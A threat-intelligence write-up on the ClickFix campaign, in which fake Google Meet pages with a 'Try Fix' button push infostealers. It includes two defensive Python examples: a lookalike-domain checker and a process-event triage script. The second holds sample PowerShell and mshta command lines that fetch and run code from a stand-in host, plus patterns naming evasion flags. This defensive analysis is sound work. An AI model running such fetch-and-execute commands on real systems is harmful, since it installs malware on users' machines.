Introduction
The ClickFix campaign represents a sophisticated social engineering threat targeting Google Meet users through phishing emails that mimic legitimate video call invitations. This campaign is particularly concerning due to its focus on distributing info-stealing malware, with a specific emphasis on cryptocurrency and decentralized finance users.
Description
Threat actors are increasingly targeting Google Meet users through a sophisticated social engineering campaign known as ClickFix, which employs convincing phishing emails that mimic legitimate video call invitations. These emails contain deceptive URLs resembling actual Google Meet links, such as meet[.]google[.]us-join[.]com and meet[.]googie[.]com-join[.]us, leading users to counterfeit Google Meet landing pages designed to distribute info-stealing malware. Initially identified as a variant of ClearFake in May 2024, this campaign has broadened its scope to specifically target cryptocurrency and decentralized finance users [9], as well as additional platforms and regions, including the United States and Japan [5].
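The following Python script is an added example, not code from the original report or from any of the cited sources. It checks the links in an email body against the lookalike pattern described above: a brand string such as "google" or "googie" appearing in a host whose registrable domain is not google.com, so that the "google" label is merely a subdomain of someone else's domain. The sample email text, the BRAND_TOKENS list and the two-label approximation of the registrable domain are assumptions of this example.

```python
"""Flag Google Meet lookalike links in an email body.

Added example, not code from the original report or its sources. It refangs
defanged indicators, extracts URLs and classifies each host as the genuine
meet.google.com, another google.com host, a lookalike that borrows the brand
name (meet.google.us-join.com, meet.googie.com-join.us), or unrelated.
SAMPLE_EMAIL and BRAND_TOKENS are constructed assumptions.
"""
import re
from urllib.parse import urlparse

LEGIT_MEET_HOST = "meet.google.com"
# Assumption: brand spellings that should never appear outside google.com.
BRAND_TOKENS = ("google", "googie", "g00gle", "goog1e")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed sample message containing two of the defanged lookalike domains
# quoted in the report plus two genuine Google links.
SAMPLE_EMAIL = """Join the call: https://meet.google.com/abc-defg-hij
Having trouble? Use https://meet[.]google[.]us-join[.]com/fix
Or the backup link hxxps://meet[.]googie[.]com-join[.]us/start
Agenda: https://docs.google.com/document/d/constructed-id
"""

def refang(text):
    """Undo common defanging so the URL regex can see the links."""
    return (text.replace("[.]", ".").replace("[ ]", ".")
                .replace("hxxp://", "http://").replace("hxxps://", "https://"))

def registrable_domain(host):
    """Last two labels of the host. Assumption: adequate for .com/.us style
    TLDs; a public-suffix list would be needed for co.uk-style TLDs."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()

def classify_host(host):
    """Return one of: legitimate, google-owned, lookalike, unrelated."""
    host = host.lower()
    if host == LEGIT_MEET_HOST:
        return "legitimate"
    if registrable_domain(host) == "google.com":
        return "google-owned"
    # Brand string present but the registrable domain is not google.com:
    # the 'google' label is just a subdomain of a domain the attacker owns.
    if any(tok in host for tok in BRAND_TOKENS):
        return "lookalike"
    return "unrelated"

def scan_text(text):
    """Return (url, host, verdict) for every link found in the text."""
    findings = []
    for url in URL_RE.findall(refang(text)):
        host = urlparse(url).hostname or ""
        findings.append((url, host, classify_host(host)))
    return findings

if __name__ == "__main__":
    for url, host, verdict in scan_text(SAMPLE_EMAIL):
        print(f"{verdict:12} {host:32} {url}")
```

Because the check keys on the registrable domain rather than on an exact string match, it also catches forms the report does not quote, such as meet.google.com.evil.example, where the genuine hostname is prepended to an unrelated domain.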
ClickFix exploits misleading error messages about microphone or camera problems on fake Google Meet pages to create a sense of urgency, tricking users into clicking a “Try Fix” button. This action initiates the infection process by executing malicious code that installs malware, bypassing browser security protections such as Google Safe Browsing. Users are often directed to join fraudulent meetings [8], since it is unlikely that such a malware installation prompt would appear in a legitimate Google Meet session. The campaign has been linked to two cybercrime groups, Slavic Nation Empire (SNE) and Scamquerteo, both associated with cryptocurrency scams and both sub-groups of larger networks such as Marko Polo and CryptoLove. Investigations reveal that these groups use shared infrastructure, indicating collaboration among multiple threat actors within a centralized Traffers team [3], which raises the possibility that they are leveraging a common, as yet unidentified cybercrime service for their operations [6].
Cybersecurity firm Proofpoint has noted that this tactic has been increasingly adopted by various threat actors [2], including the initial access broker TA571 [2] [4], to deliver a range of malware types such as DarkGate, Matanbuchus [1] [2] [4], NetSupport [1] [2] [4], Amadey Loader [1], and AMOS Stealer [1] [3] [4] [5] [7] [10], all designed to steal sensitive information and establish remote access [1]. For Windows users [2] [3] [4] [7], clicking the “Try Fix” button copies a command that leads to an HTML file containing an obfuscated VBScript [4]. This script executes two payloads: Stealc and Rhadamanthys [4], both protected by the HijackLoader crypter [4]. The command-and-control (C2) servers for these payloads are known and tracked by cybersecurity analysts [4]. On macOS [1] [3] [4] [5] [6], the “Try Fix” button downloads a file identified as AMOS Stealer [4], disguised as a .DMG file named “Launcher_v194,” which communicates with its own C2 server. This infrastructure includes JavaScript code that connects to a MongoDB database to gather user statistics and send them to Telegram bots [4].
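As an added example (not material from the report, and not a rule from any vendor cited), the Python below applies a simple heuristic to constructed Windows process-creation events that model the Windows path described above: the copied command is run by the user outside the browser, so a script host or shell appears with an interactive parent and a command line that fetches remote content. The process names, the assumption that a command typed into the Run dialog has explorer.exe as its parent, and the example.invalid URLs are assumptions of this example; the report does not name the script host the command invokes.

```python
"""Heuristic triage of process-creation events for a pasted 'fix' command.

Added example, not from the original report. The report states that the
Windows 'Try Fix' button copies a command whose execution fetches an HTML
file carrying obfuscated VBScript. This models the user pasting and running
that command: a script host or shell whose parent is explorer.exe (an
interactive launch rather than a service or installer) and whose command
line references a remote URL or evasion-style flags.
SAMPLE_EVENTS, the process name lists and the URLs are constructed assumptions.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Assumption: commands typed into the Run dialog or Start menu get explorer.exe as parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
FLAG_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|\biex\b|"
    r"invoke-expression|-enc(odedcommand)?\b)", re.IGNORECASE)

# Constructed telemetry: two pasted-command launches, a scheduled backup
# script, a harmless interactive cmd, and a browser renderer process.
SAMPLE_EVENTS = [
    {"pid": 101, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/fix.html"},
    {"pid": 102, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "irm https://example.invalid/s | iex"'},
    {"pid": 103, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"pid": 104, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"pid": 105, "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --type=renderer https://meet.google.com/abc-defg-hij"},
]

def basename(path):
    """File name component of a Windows path, lower-cased."""
    return path.lower().rsplit("\\", 1)[-1]

def score_event(ev):
    """Return the list of reasons an event resembles a pasted ClickFix command."""
    reasons = []
    if basename(ev["image"]) in SCRIPT_HOSTS and basename(ev["parent"]) in INTERACTIVE_PARENTS:
        reasons.append("script host launched interactively")
    if URL_RE.search(ev["cmdline"]):
        reasons.append("remote URL in command line")
    if FLAG_RE.search(ev["cmdline"]):
        reasons.append("evasion-style flag")
    return reasons

def triage(events, threshold=2):
    """Events with at least `threshold` reasons, as (pid, reasons) pairs."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["pid"], reasons))
    return hits

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The threshold of two reasons keeps an interactive cmd.exe with a benign command line, or a browser process whose command line happens to carry a URL, out of the hit list; a single signal is common in normal telemetry, while the combination of an interactive script host and a remote fetch is what the user-executed step of this campaign produces.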
The ClickFix campaign highlights the increasing sophistication of social engineering tactics [5], as attackers exploit fake Google Meet conference pages to compromise users with dangerous malware [5]. As virtual meetings become essential in business operations [5], it is crucial for users to remain vigilant when clicking on conference links [5], ensuring they verify URLs and refrain from executing unsolicited scripts or commands [5]. Continuous vigilance is necessary [9], as cybercriminals are likely to develop more creative methods to exploit trusted platforms [9].
The ClickFix campaign has gained traction [2] [7], with multiple independent researchers reporting on its activities [2]. Variants of this campaign [2], including OneDrive Pastejacking [2] [6], have been frequently observed [2]. The emergence of malware campaigns distributing open-source infostealers [6], such as ThunderKitty [6], Skuld [6], and Kematian Stealer [6], along with new families like Divulge [6], DedSec [6], Duck [6], Vilsa [6], and Yunit [6], signifies a notable shift in cyber threats [6]. The availability of open-source tools lowers entry barriers and encourages rapid innovation [6], potentially leading to an increase in computer infections and heightened risks for businesses and individuals [6]. Despite the concerning rise of this tactic [2], the significant user interaction required for success offers some hope [2], suggesting that aggressive enterprise training could effectively mitigate these threats [2]. Companies are advised to implement endpoint security solutions to protect against evolving cyber threats and prioritize cybersecurity awareness training to educate employees about unsolicited links and verifying meeting invitations through official channels. By remaining informed and vigilant [1], users can better protect themselves against info-stealing malware campaigns like ClickFix [1].
Conclusion
The ClickFix campaign underscores the growing sophistication of cyber threats, particularly in the realm of social engineering. As attackers continue to exploit trusted platforms like Google Meet, it is imperative for users and organizations to enhance their cybersecurity measures. Implementing robust endpoint security solutions and conducting comprehensive cybersecurity awareness training can significantly mitigate the risks posed by such campaigns. As the landscape of cyber threats evolves, continuous vigilance and proactive measures will be essential in safeguarding sensitive information and maintaining the integrity of virtual communications.
References
[1] https://cybermaterial.com/fake-google-meet-errors-spread-info-stealers/
[2] https://www.csoonline.com/article/3570506/the-google-meet-error-you-last-saw-could-be-someone-trying-to-hack-your-system.html
[3] https://www.msspalert.com/brief/phony-google-meet-alerts-deploying-infostealers
[4] https://www.infostealers.com/article/clickfix-tactic-the-phantom-meet-infostealers/
[5] https://blogs.npav.net/blogs/post/fake-google-meet-errors-used-in-clickfix-campaigns-to-spread-infostealing-malware
[6] https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html
[7] https://www.helpnetsecurity.com/2024/10/17/google-meet-fix-it-infostealers/
[8] https://it.slashdot.org/story/24/10/17/2156214/fake-google-meet-conference-errors-push-infostealing-malware
[9] https://www.forbes.com/sites/daveywinder/2024/10/18/hackers-avoid-google-chrome-security-features-in-new-attack-researchers-warn/
[10] https://www.techradar.com/pro/security/that-google-meet-invite-could-be-a-fake-hiding-some-dangerous-malware